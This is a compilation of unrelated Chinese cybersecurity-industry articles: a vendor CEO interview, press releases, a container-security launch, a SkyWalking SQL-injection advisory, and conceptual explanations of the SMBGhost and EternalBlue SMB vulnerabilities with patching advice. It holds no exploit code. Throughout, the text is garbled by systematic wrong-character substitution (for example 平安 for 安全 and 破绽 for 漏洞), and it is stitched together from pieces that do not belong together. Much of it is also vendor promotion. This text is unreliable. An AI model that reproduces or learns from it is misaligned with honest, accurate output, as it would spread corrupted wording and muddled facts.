第二个方面的变动，攻击者变得更有急躁了，已经他们都是盲扫，谁家大门关上就棘手过来拿些货色回来，而当初是有打算有针对性地攻打，并且为了最大水平地达到目标，他们攻入零碎后可能会长期的埋伏。比如说方才提到的某一个比特币交易所一次性被转走7000个比特币，攻击者确定这个攻打指标，不会立刻马上的去开展攻打动作，而是开始长期的埋伏察看。被攻打方的平安运营者因为没有心跳信息，很难发现并检测到这些威逼，攻击者的急躁体现在他们有了更久远的打算，最大限度地达到他们的指标。 第三个方面的变动，攻击者比之前有了更弱小的技术，可能绕过层层防线，埋伏在零碎中。据数据显示，有62%的攻击者可能纯熟的采纳各式各样的攻打伎俩，包含AI人工智能的伎俩。 如何应答这些变动，咱们须要从一个全新的视角思考这件事。计算机体系结构决定了任何数据都须要通过CPU进行运算，其数据须要通过内存进行存储，实践上基于CPU指令集和内存这一层面实现的平安计划能够无效进攻所有威逼。平安从内存保护登程，为纵深进攻兜底。 谈守业和人才观主持人:能不能聊一聊您的守业历程？ 姜向前: 好的，首先我算是一个间断创业者。在09年的时候，我和姚纪卫等几个敌人组建了百锐平安实验室，过后是做未知威逼检测引擎，咱们花了一年多的工夫打造这样的引擎，取得了寰球第二的问题，而后为谷歌提供服务。通常守业的念头有几种，比如说有些大学生不心愿去打工，想当老板，心愿给本人工夫和自在；有些是有一个好的创意或者技术，想把这项技术产品化。创业维艰，是一个十分有挑战的事件，如果初衷不太对的话，这个公司是很难坚持下去的。 我集体的感触，守业就像在隧道中穿行，咱们的指标是隧道止境的光。然而守业的过程中会面对很多引诱，有时候近距离的灯光会遮挡或者让人疏忽隧道止境的光洁。一个平凡的公司，创立的初心该当是通往隧道止境的光洁，向着这个久远的方向去打造有价值的产品，为社会发明价值，同时也能在这个过程中失去精力的回报。 一项好的技术或者产品肯定是面向未来的，守业初期的企业必须要耐得住寂寞，它要抢在“风口”的后面，所以在初期这项技术所对应的客户需要不肯定很大，但肯定很痛，只有这项技术能够解决，并且在服务客户的过程中，还须要一直晋升本人的商业和技术的壁垒。 主持人:大多数的守业公司都会遇到这样或者那样的挑战，您能谈一谈守业公司应该如何面对挑战吗？ 姜向前: 我感觉所有的守业公司都会遇到挑战，比如说团队的搭建，我感觉不论是小团队还是大公司都会面临这样的一个挑战，但这种挑战在小团队当中就会有限放大。举一个例子，如果一个有两个创始人的团队招的第一号员工，他来的时候对公司的影响就是30%，所以在招聘这个人的时候，与大公司相比，就要花更多的工夫和精力。大公司来讲的话，明天多招一个人影响不会那么大，而在守业晚期，招聘一旦招错了，对团队的影响就是1/30、1/10或者1/3。咱们在很多HC释放出来之后，一周两周甚至一个月没有offer收回去，这就是作为创业者很大的挑战，当咱们遇到很急的我的项目，咱们是疾速招来一个人closed掉这个岗位，实现这个我的项目，还是持续放弃招聘的高水准，不因为我的项目紧而斗争，这很考验咱们的定力。 在这里我也给安芯网盾打一个广告，咱们其实对人才十分的渴望，咱们也心愿找一波十分年老的有生机的跟咱们有雷同的价值观的，也就是对技术酷爱的，可能通过本人的致力打造对社会有影响力的有价值的产品和服务的小伙伴退出咱们团队和大牛一块共事，让本人变得更强。 主持人：那么我要替大家多问一问，安芯网盾吸引大家退出的起因都有哪些？ 姜向前：安芯网盾能吸引大家的点太多了。 首先，当初退出团队的成员都是外围的开创团队，外围的开创团队承当不一样的责任，同时也会失去更高额的回报。就拿奇安信来说，6年前抉择退出奇安信的前10号员工，在明天奇安信上市之后，肯定实现了财产自在。所以对于安芯网盾来讲，当初作为开创团队成员退出的机会来了。 其次，在安芯网盾能取得更疾速的成长。咱们当初的每一位搭档都是千挑万选退出的，并且咱们也要求他们发自内心的去欢送比本人更强的人退出团队，见贤思齐，和超一流的人一起共事，这样一个团队能失去更疾速的晋升和成长。 第三个方面就是企业文化。咱们团队外部的每个人都是平等的，所有人都会直呼其名，刚毕业的学生来到咱们公司工作也不会叫我姜总。咱们任何一位搭档成为共事，在一起工作相处的工夫超过家人，如果叫我姜总会让他感觉职级不对等，在沟通事件的时候也会不对等。我打个比方，市场部的同学花2个小时写了一篇稿子，我花了3分钟去看就否了，他拿给我的时候叫我向前，平等的去沟通，就会跟我沟通他的想法，说这样做是对的，如果我居高临下，他可能就会舍弃这个计划，再牛的人也不会在3分钟内想到一个更好的计划。 好的企业帮忙员工进步格局，咱们心愿更优良的人退出团队，并且无条件信赖，咱们心愿每一件事到了须要做决策的时候做到“此时此刻，非我莫属”，你做产品决策的时候，你就是这个产品的CEO，有参与感，有责任感。 行业论道主持人：明天是咱们BCS大主题的新基建日，新基建为企业带来了时机和挑战，您如何对待新基建浪潮中的网络安全建设？安芯网盾的战略规划和新基建有什么关系吗？ 姜向前：在新基建的推动之下，时机与挑战是同时存在的。在过来的十年中，4G技术突发猛进，许多独角兽企业随之涌现，比方小米、今日头条、美团、微信、快手、拼多多等等。 而在新基建中，会呈现大量的数字化的业务，前段时间我看到了一组数据，目前寰球联网的设施有130亿，这两头有20亿的PC、30亿的手机、还有80亿的其余设施，比方咱们当初面向的摄像机。报告显示，将来这样的设施会超过一万亿，也就是当初的一百倍。在技术引领行业改革的时代下，企业必须找准独特定位，实现技术与业务的聚焦，有策略定力。在新的技术环境下，它所须要的平安爱护，包含技术能力、方向跟过来都不太一样，也更加简单，平安是新基建的根底。对安芯网盾而言，做10个60分的性能不如3个100分的性能，咱们会对产品进行更精密的打磨，为客户提供更好的服务，在本人的畛域中当先。 主持人:往年大会的主题是“内生平安，从平安框架开始”。奇安信团体董事长齐向东在策略峰会上对这个理念进行了深刻的论述。想请问您对这个主题是怎么了解的？ 姜向前:齐总无关内生平安的演讲我之前也认真听了，有几个点让我感触比拟深。内生平安的一个重要点是治理，另一个是框架。 传统的平安产品个别都是修修补补的策略，先有业务再去装修，面向十分多的服务器，如果要画一个拓扑图，可能像个鸟窝一样，显得非常芜杂。客户的业务是非常复杂的，他们会放心平安产品是否会影响效率和业务，是否会造成误报，也有可能产生不同的服务器会相互拜访的状况，比方业务服务器拜访了数据库服务器，使业务变得非常芜杂。所以有人说要做好同步布局、同步建设以及同步经营。往年突发疫情，火神山医院、雷神山医院的建设过程，外面的医疗设施、信息安全的设置，工夫之短都是超过了世界纪录的，这就是同步布局、同步建设、同步经营的一个很好的案例。类比到信息化的建设中，如果咱们能针对客户的业务将零碎做到同步布局、建设和经营的话，平安产品就会有更大的施展空间，更好地躲避很多问题。 在这样一个框架里，安芯网盾的内存保护是基于客户业务管理中的痛点登程，将平安防护能力下沉，以防护系统和利用的平安问题，能够有效应对系统设计缺点、内部入侵等威逼，帮忙用户实时进攻并终止无文件攻打、0day 攻打和基于内存的攻打等。 举荐浏览 平安从内存保护开始，安芯网盾斩获2020平安创客汇总冠军 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

Java反序列化破绽 Apache Shiro RememberMe 1.2.4 近程代码执行 有些攻打告警须要排查cookie中remeberMe数据包，是否攻打胜利，做了哪些操作。解密原理比较简单，应用常见的AES密钥解密，明文里蕴含aced0005的magic number即为解密胜利 去年做了一个简略的网页版解密工具，源码弄丢了，又从新做了一个，内置100多个key，退出了对象结构化展现的性能，看起来更不便。原理是依据序列化协定，逐字节读取解析，参考了tcalmant/python-javaobj这个我的项目。ysoserial CommonsBeanutils CommonsCollections等payload都能辨认展现进去 https://sec.dog/shiroDecrypt.html

8月11日，2020年度平安创客汇总决赛在北京香格里拉酒店胜利举办，安芯网盾作为国内内存平安的开拓者怀才不遇，通过近一个月的线上提拔到华北明星赛第一名，最终问鼎2020年度平安创客汇10强赛总决赛冠军，并取得奇安投资2000万的投资动向，现场沸点资本追加2000万的投资动向，成为该项较量历史上第一家被现场追投的企业。  平安创客汇自2016年开办以来，通过多年倒退曾经从最后的聚焦网络安全畛域的业余创投平台，成长为涵盖了创客明星赛、创客沙龙、守业培训等多主题、多流动、多服务的翻新生态平台。据理解，与今年不同的是，往年的平安创客汇明星赛决赛邀请了蕴含政府代表、甲方代表、业内专家、平安创业者、出名投资人的20位特邀专家评审和130位业余评审团组成的五方评委，别离从政府疏导、客户需要、守业视角和投资人视角来扫视加入决赛的企业，从“创新性”、“利用场景和市场潜力”、“社会效应和贡献度”以及“外围团队的形成和能力”等维度充沛评估每一家守业企业，最终筛选出了优良创业者。  CEO姜向前示意，作为守业公司首先要打造单点冲破的好产品，做10个60分的性能不如做3个100分的性能。2009年他和CTO姚纪卫第一次守业做未知威逼检测引擎，为谷歌、华为等知名品牌服务，2019年再度携手推出内存保护产品，通过对CPU指令集的细粒度监控，可能在指令集和寄存器这个层面第一工夫检测并阻断未知威逼攻打，是十年磨一剑。平安从内存保护开始。安芯网盾内存保护零碎由零碎专家和平安专家联手打造， 开创性地把平安产品从应用层和零碎层，下沉到硬件层，安芯网盾也是华为鲲鹏打算的明星合作伙伴。在某客户的实战演练中，安芯网盾智能内存保护零碎是惟一一款能够帮忙客户防护黄金票据攻打、无文件攻打的产品。 作为国内内存平安的开拓者，安芯网盾凭借实力取得了本届平安创客汇的总决赛冠军。作为引领内存保护技术创新利用的标杆，安芯网盾将继续为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案，在内存平安畛域继续翻新，为客户提供更具竞争力的产品和服务。 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

煊赫一时的“联邦学习”技术正在从概念逐渐转变为各行各业数字化转型的底层技术撑持。 近日，第五届CCF-GAIR寰球人工智能与机器人峰会上，腾讯平安天御凭借其在信贷风控场景的落地实际，荣获首个CCF-GAIR“联邦学习利用奖”，标记着腾讯平安在帮银行解决好数字化转型危险的实际与摸索备受行业必定与认可。 随同着金融市场的减速凋谢与需要延展，传统线下信贷业务效率低、危险高、迭代难、扩张慢等短板日益凸显。在云计算、大数据、AI、物联网等新兴技术的推动下，整个金融信贷产业正逐渐放慢向无接触信贷转型的迭代步调。而面对无接触信贷体现出的大流量、高可触达等特点，风控能力成为产业互联网时代金融业务平安发展的相对外围。 相较线下业务，无接触信贷的客群多样，并且易受市场稳定影响。现有风控的人工模式（1.0），信贷工厂模式（2.0），甚至基于通用评分的大数据风控模式（3.0），都只能做到部分的优化，无奈在整个风控链条对新客群或新变动进行迭代调整。而“联邦学习”这一新兴 AI 根底技术，因能在多参与方或多计算结点之间实现高效机器学习而成为金融行业买通信贷风控“大循环”，实现对差别客户定制化，对市场变动自适应的动静危险管控，将信贷风控带到4.0时代。 基于金融信贷行业致力摸索如何使用联邦学习突破数据孤岛、实现多方数据加密，以助力本身业务倒退的新趋势和新需要，腾讯平安天御踊跃与金融机构开展了联结建模的实际单干。 作为针对个性场景的定制化联结建模模型，腾讯联邦学习模型与通用模型在性能上并无差别，却实现了比通用模型更佳的KS成果。在与包含银行、新金融、头部消金在内的十余家客户的单干实际中都实现了30%-40%的KS晋升。 联合在信贷风控方面的实践经验与摸索，腾讯平安天御还基于联邦学习技术打造出了一套贯通预测、响应、决策和监控的继续动静自适应危险管控体系，即天御·星云信贷风控系统。该零碎能为银行等金融机构提供联邦模型、专家征询、业务零碎和经营等服务，帮忙金融客户在坏账率不变的状况下，实现风控通过率由20%到30%的晋升，可能无力晋升金融机构的信贷盈利能力，为产业转型降级提供助力，推动信贷风控开启4.0时代。 在大会上，腾讯平安天御金融风控负责人李超对于利用联邦学习实现无接触信贷的自适应风险管理进行了分享。 腾讯平安天御基于联邦学习技术帮助某银行实现了线上信贷业务零碎的建设，在“数据不出域”的前提下联结构建反欺诈模型、画像模型，模型效果显著晋升。在丰盛银行的大数据信贷风控能力同时实现差异化定价，既满足了银行理论治理需要，资金又失去高效应用。 除信贷风控外，腾讯平安天御金融团队还基于其在金融行业的摸索实际，继续为金融行业客户输入反欺诈、风控系统搭建与经营、风控征询以及一站式全面风控解决方案等能力和服务，并积极参与牵头执行及正式立项多项国家标准和国际标准，旨在为金融行业的数字化转型倒退提供定制化的平安撑持。 目前，腾讯平安天御已成为国内惟一入选的Gartner银行级在线反欺诈举荐厂商。将来，腾讯平安天御将持续联动生态搭档力量，延展包含联邦学习技术在内的金融风控平安能力的“触角”，构筑金融平安新生态。

嘿，这里有一份干货满满的收费课程 你晓得要如何获取吗? 竖起耳朵，偷偷通知你 智慧E学堂网络安全攻与防主题课程开课啦！ 攻防反抗，从实际中获取真知！ 课程工夫 8月11日下午14:00—16:00 课程主题 零碎中的暗藏破绽难以杜绝、防不胜防，企业外围数据在不够健全的平安防护措施中仍然容易呈现裸奔景象。学习网络安全攻与防，为企业外围数据安全保驾护航！ 北京九州聚源总经理徐杰和安芯网盾副总经理杨春光将会别离从“攻”与“防”两个对抗的角度讲述新型智能技术在网络安全畛域的利用与解决方案剖析。 在本次课程中，两位主讲人将会率领你粗浅看清网络安全攻防的过程，捋清架构、内容和工序，学习如何进攻并终止在业务中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障企业的外围数据不被窃取。 课程入口https://appccbmhdav1387.h5.xi... 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

近年来，以容器为代表的云原生失去了市场的高度认可，正逐渐成为新一代支流IT基础设施。但因为容器以及容器应用环境引发的平安危险与安全事件一直爆出，容器的平安问题也随之浮出水面。 8月6日，腾讯平安和青藤云平安独特举办容器平安平台新品策略单干发布会，基于腾讯平安提供的高效稳固的云服务为根底，以青藤的最新容器平安平台为依靠，打造青藤蜂巢·容器平安平台，助力企业客户无效解决平安上云问题。 腾讯平安与青藤新品策略单干公布典礼 容器平安成云平安重要抓手，保障平安需“软硬兼施”从简略的利用容器化，到云原生利用的开发，容器技术成为了其最根底也是最外围的撑持技术。腾讯平安专家谢奕智在发布会上谈到，容器平安是云平安十分重要的一个组成部分，也是一个十分重要的抓手，次要体现为以下几个方面： 镜像平安，例如镜像中蕴含了恶意代码、镜像中的组件存在破绽、明文秘钥等；资产治理，整个容器的资产可见性是IT人员比拟器重的；配置管理，主动发现配置上的平安问题，能够晋升研发效率；满足合规要求；运行时的威逼防护，包含入侵检测、病毒逃逸和木马；网络隔离，尤其是在东西向流量剧增状况下确保其安全性；风险管理。将来在硬件上须要为整个容器提供可信计算的环境，而在软件方面，更多地要关注利用。 联结打造青藤蜂巢，为容器提供全生命周期平安防护因为容器技术的宽泛应用，平安须要进一步左移，在镜像构建晚期阶段就发现问题，尽早地定位平安问题，以解决攻击面和潜在的运行问题。 腾讯平安联结青藤云平安打造的青藤蜂巢，提供全生命周期的一站式解决方案，实现了平安预测、进攻、检测和响应的平安闭环。青藤蜂巢次要提供容器资产盘点、镜像平安、运行时平安、合规基线等性能。 青藤蜂巢全生命周期的一站式解决方案 具体的业务级别的资产盘点，一方面让平安人员能够去清晰地理解本人的爱护对象，另一方面能够在产生了一些入侵行为，或者是发现一些危险的时候，能够通过资产盘点做进一步的剖析和溯源。容器平安外面十分重要的一点是，镜像平安。在CI/CD环节，镜像仓库外面，应用的镜像进行深度的扫描。运行环境的平安，包含了K8S的平安、宿主机节点的平安问题。入侵检测会实时检测容器内的入侵行为，比方Webshell等。容器外面的拜访关系，尽可能的梳理客户业务关系，提供细粒度的隔离策略，帮忙客户更好地进行内网环境的隔离。合规基线，基于K8S等基线的要求，做了容器以及K8S在应用过程中须要遵循的配置平安问题。容器审计，会记录容器外面所有的行为，在产生了入侵行为的时候，能够通过这样的审计记录很好地去溯源，看黑客进入到容器外面当前又产生了什么事件。目前青藤蜂巢反对两种装置部署形式，一种是操作系统上装置主机Agent，这种形式能够一个Agent同时笼罩主机平安以及容器平安的问题。第二种形式是符合云原生的平安架构，提供了容器化的Agent，劣势次要是在于能够集成到K8S里，通过集中管理更好地部署在容器环境中。 在云原生环境下，必须要将容器平安视为云平安的一部分，通过容器平安增强云平安态势，有助于从本源上解决云原生平安问题。将来，腾讯平安将与青藤云平安深刻联手，独特打造最佳的容器平安一站式解决方案，保护客户容器平安以及云平安，推动构建云原生平安新生态。

近日，腾讯蓝军（force.tencent.com）发现并向Apache SkyWalking官网团队提交SQL注入破绽（破绽编号：CVE-2020-13921），目前官网已公布新版本修复该破绽。 为防止您的业务受影响，腾讯云平安建议您及时发展平安自查，如在受影响范畴，请您及时进行更新修复，防止被内部攻击者入侵。 破绽详情Apache SkyWalking 是一款利用性能监控（APM）工具，对微服务、云原生和容器化利用提供自动化、高性能的监控计划。其官方网站显示，大量的国内互联网、银行、民航等畛域的公司在应用此工具。 在SkyWalking多个版本中，默认凋谢的未受权GraphQL接口，通过该接口，攻击者能够结构歹意的申请包进行SQL注入，从而导致用户数据库敏感信息泄露。鉴于该破绽影响较大，倡议企业尽快修复。 危险等级高风险 破绽危险通过SQL注入，攻击者能够在服务器上窃取敏感信息 影响版本Apache SkyWalking 6.0.0~6.6.0 Apache SkyWalking 7.0.0 Apache SkyWalking 8.0.0~8.0.1 修复版本Apache SkyWalking 8.1.0 修复倡议官网已公布新版本修复该破绽，腾讯云平安建议您： 1. 举荐计划：降级到Apache SkyWalking 8.1.0或更新版本。 2. 如临时无奈降级，作为缓解措施，倡议不要将Apache SkyWalking的GraphQL接口裸露在外网，或在GraphQL接口之上减少一层认证。 3. 举荐企业用户采取腾讯平安产品检测并拦挡Apache SkyWalking SQL注入破绽的攻打。 腾讯平安解决方案 腾讯云T-Sec Web利用防火墙已反对拦挡进攻SkyWalking SQL注入破绽攻打。 官网更新通告和降级链接：https://github.com/apache/skywalking/releases/tag/v8.1.0

2020年年初，微软公布了一个紧急补丁，以修复SMBv3的破绽，该破绽编号为CVE-2020-0796。 CVE-2020-0796的可蠕虫性让人想起永恒之蓝，永恒之蓝是SMBv1中的一个近程代码执行（RCE）破绽，也就是灾难性恶意软件WannaCry的次要媒介。一旦攻击者胜利利用CVE-2020-0796，近程攻击者就能够齐全管制存在破绽的零碎，所以被称为“永恒之黑”。 受永恒之黑影响的零碎 Windows 10版本1903（用于32位零碎） Windows 10版本1903（用于基于ARM64的零碎） Windows 10版本1903（用于基于x64的零碎） Windows 10版本1909（用于32位零碎） Windows 10版本1909（用于基于ARM64的零碎） Windows 10版本1909（用于基于x64的零碎） Windows Server 1903版（服务器外围装置） Windows Server 1909版（服务器外围装置） 永恒之黑的破绽利用机制 srv2.sys中的Srv2DecompressData函数中存在一个整数溢出谬误。当SMB服务器收到格局谬误的SMB2_Compression_Transform_Header时，能够触发此破绽。此函数创立一个缓冲区，用于保留解压缩的数据，该函数通过将“ OriginalSize”增加到“ Offset”来计算缓冲区大小，导致ECX寄存器中的整数溢出。一旦计算出缓冲区大小，它将大小传递给SrvNetAllocateBuffer函数来调配缓冲区。 随后，内核调用了RtlDecompressBufferXpressLz函数来解压缩LZ77数据。下面的屏幕截图显示，内核应用“ rep movs”指令将0x15f8f（89999）字节的数据复制到缓冲区中，该缓冲区的大小先前调配为0x63（99）字节，导致缓冲区溢出，从而导致内存损坏和内核解体。 永恒之黑属于SMB内存损坏破绽，其可蠕虫性可能可能利用此破绽感化并通过网络流传，这与WannaCry勒索软件在2017年利用SMB服务器破绽的形式非常相似。 攻击者是如何利用永恒之黑的？ 攻击者利用永恒之黑的攻打伎俩次要有三种。 伎俩一：在某些公司网络上退出域时，会主动关上SMB端口，从而使该计算机裸露于近程攻打模式，利用该破绽，开发或应用破绽利用的攻击者能够齐全管制该计算机。 伎俩二：攻击者的另一种状况是创立本人的SMB服务器，而后诱使用户连贯到其歹意服务器。这种攻打可能采取垃圾邮件或即时消息的模式，并带有指向托管恶意代码的邪恶SMB服务器的链接。如果攻击者压服用户单击链接，或者只是近程零碎上的共享名（或映射的驱动器），那么歹意服务器将发送该链接，并立刻取得对其的齐全管制。 伎俩三：攻击者首先通过其余形式毁坏计算机，例如，通过成为关上歹意附件的受害者成为受害者。随后，攻击者能够利用永恒之黑来批改内核的要害组件以取得SYSTEM特权，使攻击者简直能够在计算机上执行任何操作。 永恒之黑该当如何防止？ 系统安全防护有余，危险最大的无疑是企业外围数据。为了让企业无效防护永恒之黑的破绽利用攻打，咱们比照了三种可行的防护计划： 目前寰球范畴可能存在永恒之黑破绽的主机总量约10万台，首当其冲成为黑客攻击的指标，若被蠕虫化利用可导致数据失落、信息泄露、服务器瘫痪等状况。传统平安防护措施在此类高级威逼背后曾经生效，外围数据与业务必须失去更进一步的保障。安芯网盾智能内存保护零碎通过虚拟化监测内存异样，通过网络过滤仅容许非法的SMB通信，失常的业务通信不受影响，同时阻止了主机之间的其余横向挪动，轻松解决永恒之黑和其余要害破绽。 参考链接： [1]https://news.sophos.com/en-us... [2]https://paper.seebug.org/1168/ [3]https://www.sans.org/blog/mic... [4]https://www.avesnetsec.com/cv... [5]https://medium.com/@knownsec4... [6]https://www.exploit-db.com/ex... [7]https://www.fortinet.com/blog... [8]https://blog.51cto.com/liulik... [9]https://blog.rapid7.com/2020/...

极客的奇思妙想遇上新基建还PWN得动吗？ 国内首个新基建平安大赛通知你答案！ 8月3日，由中国产业互联网倒退联盟领导，腾讯平安、安信天行、任子行、深服气、拓尔思、卫士通、晓得创宇等多家平安企业联结发动，国内当先的平安团队KEEN主办的新基建平安大赛在北京正式发表启动！ 大赛旨在通过从极客的视角揭示新基建技术在各个行业利用中可能遇到的平安危险场景，拉响新基建的平安预警和攻防演练，为新基建全面部署储备平安技术和人才。 中国工程院院士邬贺铨、中国产业互联网倒退联盟秘书长雷晓斌、国家工业信息安全倒退钻研核心首席专家张格、腾讯副总裁丁珂、KEEN公司总经理杨泉等政产学研各界代表缺席了大赛启动典礼。 为什么这么多社会力量汇合要在一起发动新基建平安大赛？ 随同着新基建的全面部署，平安正在变得前所未有的重要。将来十年，大量新业态、新场景、新模式都将基于数字化技术蓬勃发展，一旦平安呈现问题，将给数字经济带来“地震式影响”，平安俨然已成为新基建的“基建”。雷晓斌在启动典礼致辞时示意，新基建下的平安，甚至曾经不能用传统的“网络安全”来定义，很多场景都潜藏着平安危险。 面对新基建这片充斥未知的平安战场，本届新基建平安大赛提倡从“黑客的视角”登程，开掘可能存在的平安威逼，预演新基建场景下的平安攻防，提前发现问题并解决问题，为新基建的平安倒退保驾护航。 腾讯副总裁丁珂示意，腾讯平安联结生态搭档独特发动本次大赛，就是心愿将较量打造成以新基建为锚点的国内规模最大和最具公信力的新基建平安赛事。以赛代练开掘优秀人才，为数字时代的到来，做好平安技术和平安人才的储备。 在赛制设计上，组委会将经典的攻破挑战与新基建场景联合。据KEEN公司总经理、大赛负责人杨泉介绍，本次较量笼罩七大新基建重点畛域，以新基建技术在各个行业利用中的产品、模块、技术、零碎等作为平安钻研指标，在正当攻打条件下利用安全漏洞、或者其余新鲜的技术手段找到安全隐患。 为了更好地让极客的想象力能转化成护航新基建的平安成绩，本届新基建平安大赛沿用极客攻破挑战中经典的“负责任的破绽披露”准则。与此同时，腾讯平安玄武实验室负责人于旸（TK教主）、华为首席云平安生态官万涛等顶尖平安专家担纲本次赛事的评委，全程领导并裁定赛事进行，保障极客的每一份平安钻研，都能为新基建平安添砖加瓦。 同时，大赛还组建了蕴含邬贺铨院士、雷晓斌秘书长以及多家平安企业负责人等组成的顾问团，致力于以本次新基建大赛为枢纽，打造政产学研联动的常态化，举生态之力护航新基建平安。 “新基建”平安大赛详情： 带来首个新基建平安大赛的同时，政产学研各界代表还围绕新基建下的平安话题带来智慧碰撞： 除此之外，来自任子行、拓尔思、卫士通等多家国内安全企业负责人，以及KEEN公司和腾讯平安玄武实验室负责人，也在启动会的行业沙龙接棒新基建平安议题，联合本身实践经验和行业洞察，分享了新基建下涌现的5G、区块链、人工智能等新技术与平安的辩证关系，以及发动新基建平安大赛的思考。 目前，新基建平安大赛已面向寰球平安团队和爱好者正式开启报名，总决赛将于10月24日与GeekPwn 2020国内平安极客大赛同步进行。有志于推动新基建平安建设的极客可至官网报名，点击GeekPwn官网，即刻报名！

近日，Tellyouthepass勒索病毒被发现再次沉闷，攻击者利用了EternalBlue（永恒之蓝）内网扩散模块集成到勒索攻打包中，实现内网蠕虫式病毒传播，并已对局部企业进行攻打，如果没有采取及时的防护措施，可能给企业带来微小的损失。 tellyouthepass中永恒之蓝的利用代码 永恒之蓝是何方神圣 永恒之蓝是美国国家安全局开发的破绽利用程序，于2017年4月14日被黑客组织Shadow Brokers透露。永恒之蓝蕴含过程间通信共享（IPC $），该共享容许空会话。这意味着该连贯是通过匿名登录建设的，默认状况下容许空会话，空会话容许客户端向服务器发送不同的命令。 自2018年永恒之蓝被WannaCry利用并在寰球各国掀起风波之后，热度至今没有消减。尽管微软于2017年公布过Microsoft Windows补丁，修补了这个破绽，当初仍然有许多黑客利用永恒之蓝进行攻打。与此同时该程序也在一直进化，甚至造成了每周更新的传统，曾将EXE攻击方式逐渐切换到利用Powershell脚本实现无文件攻打。 永恒之蓝的工作机制 永恒之蓝依赖于一个名为srv!SrvOS2FeaListSizeToNt的windows函数。要理解它是如何导致近程执行代码，首先须要理解SMB的工作机制。SMB（服务器音讯块）是一种协定，用于通过网络从服务器零碎申请文件和打印服务。在协定的标准中，有一些构造能够使协定传播无关文件扩大属性的信息，实质上是无关文件系统上文件属性的元数据。 在此基础上，永恒之蓝利用了协定中的三个不同的谬误。 第一个谬误是当协定试图将OS / 2 FileExtended Attribute（FEA）列表构造转换为NT FEA构造以确定要调配多少内存时呈现的数学谬误。错误计算会产生整数溢出，导致调配的内存少于预期的数量，进而导致缓冲区溢出。如果写入的数据超出预期，则多余的数据可能溢出到相邻的存储空间中。 第二个谬误是因为SMB协定对两个相干子命令：SMB_COM_TRANSACTION2和SMB_COM_NT_TRANSACT的定义不同而导致的缓冲区溢出。两者都有一个_SECONDARY命令，当单个分组中蕴含太多数据时应用该命令。TRANSACTION2和NT_TRANSACT之间的要害区别在于，后者须要一个数据包，大小是前者的两倍。如果客户端应用NT_TRANSACT紧接在前的子命令发送精心制作的音讯，则会产生TRANSACTION2验证谬误。尽管协定辨认出两个离开的子命令已被接管到，其调配的类型和尺寸的数据包（并相应地分配内存）仅基于接管到的最初一个数据包的类型。因为最初一个较小，因而第一个数据包将占用比调配的更多的空间。 一旦攻击者实现了最后的溢出，他们就能够利用SMBv1中的第三个bug，该bug呈现在SMB_COM_SESSION_SETUP_ANDX命令中：该命令的申请依赖于WordCount的值来确定具体的申请格局，当为12时和为13时红框中的变量会有所区别，利用该破绽将12类型的申请包通过13类型进行解决，因为两种类型的申请包格局不统一，通过管制申请包指定偏移的数据，即能够管制SrvAllocateNonPagedPool创立的pool的大小，实现堆喷射，导致在指定地址分配内存，使得攻击者能够编写和执行Shellcode来控制系统。 如何防止利用永恒之蓝的攻打 首先，确保更新并利用安全补丁MS17-10，其次禁用SMBv1，并且不使任何易受攻击的计算机拜访互联网。 以后网络局势下，已呈现疑似永恒之蓝病毒变种，例如：wannaRen的病毒，应答这些新的威逼，传统防护伎俩很难无效防备，安芯网盾内存保护零碎通过硬件虚拟化技术对内存歹意行为进行监控，可能无效检测到内存中缓冲区溢出、堆栈溢出、部署shellcode、执行shellcode、等歹意行为，无效防护这类新威逼。 参考文献： [1]https://www.sentinelone.com/b... [2]https://www.anquanke.com/post... [3]https://zh.wikipedia.org/wiki... [4]https://www.freebuf.com/mob/a...

